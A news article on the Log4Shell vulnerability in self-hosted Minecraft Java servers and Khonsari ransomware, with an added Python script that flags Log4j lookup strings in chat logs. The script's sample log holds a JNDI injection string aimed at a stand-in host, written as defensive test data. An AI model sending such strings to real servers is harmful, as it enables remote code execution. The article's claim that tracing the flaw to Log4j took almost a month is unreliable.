Host your own Minecraft server? Fix now and protect yourself from Log4j ransomware attacks

Are you tired of hearing about Log4shell again? Get settled in, because one of the three worst security exploits of all time doesn’t go away overnight. Microsoft has updated its article on the vulnerability (which we noted Wednesday) again, this time with a few notes on protecting “non-Microsoft-hosted Minecraft servers”.

Indeed, while Microsoft would really prefer everyone to upgrade to the “Bedrock” version of Minecraft on the Windows Store – which strongly encourages gamers to congregate on Microsoft’s own Minecraft servers – the Java version remains dominant thanks to the ease of hosting your own heavily modified Minecraft world.

Like hosting any web service, however, it is not without its risks. Every time you open a computer to the Internet, you make yourself a visible target for the scum of the Earth. Servers with available services usually advertise those services on specific network ports, and even if they don’t, it is trivial to scan a system for listening services. From there, it is enough to form the correct query to exploit the available security holes.

Well, when the hole in question is as wide as Log4j’s Log4shell exploit, opening a vulnerable internet service is like leaving the doors of a mall open all night. So it is that Microsoft is aggressively advising Minecraft server operators to upgrade their game to the latest version, 1.18.1. Unsurprisingly, the Java version of Minecraft uses Log4j for its logging, and earlier versions of the game software are totally vulnerable to the Log4shell flaw.

This awkward hand-drawn logo has come to represent the severe vulnerability on the web.

This is a bigger problem than it might look to people who don’t play Minecraft, or who have only played the Bedrock version. Minecraft servers are very often hosted on older versions of the game, even as far back as version 1.08, first released in 2014. The reason is that mods need to be updated for newer versions of the game. Some older modpacks are still a lot of fun, but they just won’t work on the latest version of the game. Given the severity of this Log4shell exploit – it can be triggered with just one chat message – it seems unlikely that most of these servers will remain open to the public, which is a shame.
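Because the flaw can be triggered from chat, a server's own log is the first place to look for attempts. The following is an added example (not from the original article or from Microsoft) that scans log text in the vanilla Java-edition layout for Log4j lookup syntax in chat lines; the sample lines, player names and the example.invalid host are constructed, and the function name is hypothetical.

```python
import re

# Constructed sample in the vanilla Java-edition server log layout
# (logs/latest.log). Names and the example.invalid host are made up.
SAMPLE_LOG = """\
[18:02:11] [Server thread/INFO]: Alex joined the game
[18:02:40] [Server thread/INFO]: <Alex> selling diamonds, ${5} each
[18:03:05] [Server thread/INFO]: <Steve> ${jndi:ldap://example.invalid/a}
[18:03:09] [Server thread/INFO]: <Alex> nice base!
[18:04:17] [Server thread/INFO]: <Eve> ${java:version}
"""

# A chat line: [time] [thread/level]: <player> message
CHAT_LINE = re.compile(r"^\[(\d{2}:\d{2}:\d{2})\] \[[^\]]+\]: <([^>]+)> (.*)$")

# Log4j lookups have the form ${prefix:key}. Matching any "${...:" rather
# than only the literal "jndi" also catches other lookup types, while a
# plain "${5}" with no prefix is ignored.
LOOKUP = re.compile(r"\$\{[^}]*:")


def scan_chat(log_text):
    """Return (time, player, kind, message) for chat lines that contain
    Log4j lookup syntax. kind is "jndi" when the message mentions JNDI,
    otherwise "lookup". A hit records an attempt, not a compromise."""
    hits = []
    for line in log_text.splitlines():
        m = CHAT_LINE.match(line)
        if not m:
            continue  # joins, server messages, stack traces, etc.
        when, player, message = m.groups()
        if LOOKUP.search(message):
            kind = "jndi" if "jndi" in message.lower() else "lookup"
            hits.append((when, player, kind, message))
    return hits


if __name__ == "__main__":
    for when, player, kind, message in scan_chat(SAMPLE_LOG):
        print(f"{when} {player:<8} {kind:<6} {message}")
```

A hit on an already-upgraded server is just noise in the log; on an older server it is a reason to take the machine offline and investigate before upgrading.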

Microsoft says it has observed attacks on compromised Minecraft servers used to deploy Khonsari malware. Khonsari is a new type of ransomware that Cado Security actually calls “a little boring.” Essentially, the malware, once loaded, finds all mounted drives and begins to encrypt everything on them. While Khonsari leaves a ransom note, the contact details seem to be wrong, leaving affected victims no way to decrypt the data. For this reason, it is essentially a more frustrating version of a “wiper” malware that simply deletes the data.

It is interesting to see the news come full circle on this exploit. Log4shell was first exposed as an exploit in Minecraft, after all. It took almost a month before it was discovered that the flaw was not in Minecraft itself but rather in Log4j, sending network operators and server administrators scrambling to protect vital infrastructure. Few people, even the developers, realized how widespread the Log4j package was. Updates to protect against the vulnerability itself briefly took down Steam and iCloud.